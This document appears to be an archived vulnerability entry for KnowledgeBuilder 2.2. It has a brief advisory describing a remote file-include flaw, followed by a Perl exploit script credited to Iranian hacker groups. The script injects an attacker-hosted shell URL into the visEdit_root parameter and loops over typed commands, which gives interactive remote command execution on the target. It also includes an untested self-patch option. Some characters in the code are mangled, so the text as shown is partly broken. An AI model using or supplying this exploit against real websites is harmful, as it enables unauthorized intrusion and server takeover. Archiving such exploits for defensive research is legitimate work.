source: http://www.securityfocus.com/bid/20857/info

KnowledgeBuilder is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Version 2.2 is vulnerable to this issue; other versions may also be affected.

#!/usr/bin/perl
 #
 # knowledgeBuilder v.2.2.php.NuLL-WDYL=  Remote File Include Vulnerability
 # Script.............. :knowledgebuilder php.NuLL WDYL
 # Discovered By.... : IGI
 # Expl0iter ........ : Root3r_H3LL    # Location .......... : Iran
 # Class..............  : Remote
 # Original Advisory :http://www.Virangar.org & http://Www.PersainFox.com
 # <Spical TNX Irania Hackers :
 #  ( Aria-Security , Crouz , DeltaHacking , Iranhackers
 #   Kapa TeaM , Ashiyane , Shabgard , Simorgh-ev, Xmors )

 use LWP::UserAgent;
 use LWP::Simple;

 $target = @ARGV[0];
 $shellsite = @ARGV[1];
 $shellcmd = @ARGV[2];
 $file = "/admin/e_data/visEdit_control.class.php?visEdit_root=";

 if(!$target || !$shellsite)
 {
     usage();
 }

 header();

 print "Type 'exit' to quit";
 print "[cmd]\$";
 $cmd = <STDIN;

 while ($cmd !~ "exit")
 {
     $xpl = LWP::UserAgent-new() or die;
         $req =
 HTTP::Request-new(GET=$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd)
 or die("\n\n Failed to connect.");
         $res = $xpl-request($req);

 $r = $res-content;
         $r =~ tr/[\n]/[&#234;]/;

     if (@ARGV[4] eq "-r")
     {
         print $r;
     }
     elsif (@ARGV[5] eq "-p")
     {
     # if not working change cmd variable to null and apply patch manually.
     $cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die();  visEdit_control.class.php";
     print q
     {
 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
 !!                                Patch Applied                              !!
 !! Code added to visEdit_control.class.php:                                  !!
 !! if(basename(__FILE__) == basename($_SERVER['PHP_SELF']))                  !!
 !!    die();                                                                 !!
 !!                                                                           !!
 !! NOTE: Adding patch function has not been tested. If does not complie or   !!
 !! there is an error, simply make cmd = null and add the patch code to       !!
 !! visEdit_control.class.php                                                 !!
 !!                                                                           !!
 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
     }
     }
     else
     {
     print "[cmd]\$";
     $cmd = <STDIN;
     }
 }

 sub header()
 {
     print q
     {
 ................................................................
 ..                                                            ..
 ..     knowledgebuilder <=  Remote File Include  Exploit      ..
 ..                                                            ..
 ................................................................
 ..                Virangar Under Ground TeaM                   ..
 ..                           AND                              ..
 ..              PerSiaNFox NetWork Security TeaM              ..
 ..                  Discovered By : IGI                       ..
 ..                 ExPl0iter : Root3r_H3LL                    ..
 ................................................................
 ..                     Www.Virangar.OrG                       ..
 ..                    Www.PerSiaNFox.coM                      ..
 ..                     Www.Virangar.NeT                       ..
 ................................................................

                    </\/\\/_ 10\/3 15 1|)\4/\/
     };
 }

 sub usage()
 {
 header();
     print q
     {
                 ..............................
                             Usage

 perl Expl0it.pl <Target website <Shell Location <CMD Variable <-r <-p
 <Target Website - Path to target eg: www.SiteName.com
 <Shell Location - Path to shell eg: www.Sh3llserver.com/sh3ll.txt
 <CMD Variable - Shell command variable name eg: cmd
 <r - Show output from shell
 <p - Patch visEdit_control.class.php
                            Example

 perl Expl0it.pl http://SiteName http://Sh3llserver/sh3ll.txt cmd -r -p


     };
 exit();
 }

